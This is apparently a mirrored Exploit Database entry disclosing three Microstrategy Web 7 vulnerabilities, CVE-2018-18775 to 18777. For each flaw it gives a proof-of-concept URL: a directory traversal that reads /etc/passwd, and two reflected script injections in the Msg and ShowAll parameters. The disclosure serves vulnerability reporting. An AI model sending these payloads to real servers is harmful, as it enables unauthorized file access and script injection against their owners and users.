Microstrategy Web 7 – Cross-Site Scripting / Directory Traversal

• Exploit Database
• 11 阅读

• 作者： Rafael Pedrero
  日期： 2018-10-30
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/45755/

• <!--
  # Exploit Title: Path traversal vulnerability in Microstrategy Web version 7
  # Date: 29-10-2018
  # Exploit Author: Rafael Pedrero
  # Vendor Homepage: https://www.microstrategy.com
  # Software Link: https://www.microstrategy.com
  # Version: Microstrategy Web version 7
  # Tested on: all
  # CVE : CVE-2018-18777
  # Category: webapps
  
  1. Description
  
  Directory traversal vulnerability in Microstrategy Web, version 7, in
  "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote
  authenticated users to bypass intended SecurityManager restrictions and
  list a parent directory via a /.. (slash dot dot) in a pathname used by a
  web application.
  
  
  2. Proof of Concept
  
  http://X.X.X.X/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd
  
  3. Solution:
  
  The product is discontinued. Update to last version this product.
  Patch:
  https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
  
  -->
  
  <!--
  # Exploit Title: Cross Site Scripting in Microstrategy Web version 7
  # Date: 29-10-2018
  # Exploit Author: Rafael Pedrero
  # Vendor Homepage: https://www.microstrategy.com
  # Software Link: https://www.microstrategy.com
  # Version: Microstrategy Web version 7
  # Tested on: Unix
  # CVE : CVE-2018-18775
  # Category: webapps
  
  1. Description
  
  Microstrategy Web, version 7, does not sufficiently encode user-controlled
  inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
  Login.asp Msg parameter.
  
  
  2. Proof of Concept
  
  http://X.X.X.X/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=
  "><script>alert("XSS");</script><"
  
  3. Solution:
  
  The product is discontinued. Update to last version this product.
  Patch:
  https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
  
  -->
  
  <!--
  # Exploit Title: Cross Site Scripting in Microstrategy Web version 7
  # Date: 29-10-2018
  # Exploit Author: Rafael Pedrero
  # Vendor Homepage: https://www.microstrategy.com
  # Software Link: https://www.microstrategy.com
  # Version: Microstrategy Web version 7
  # Tested on: all
  # CVE : CVE-2018-18776
  # Category: webapps
  
  1. Description
  
  Microstrategy Web, version 7, does not sufficiently encode user-controlled
  inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
  admin.asp ShowAll parameter.
  
  
  2. Proof of Concept
  
  http://X.X.X.X/microstrategy7/admin/admin.asp?ShowAll=
  "><script>alert("XSS")</script><"&ShowAllServers=show
  
  3. Solution:
  
  The product is discontinued. Update to last version this product.
  Patch:
  https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
  
  -->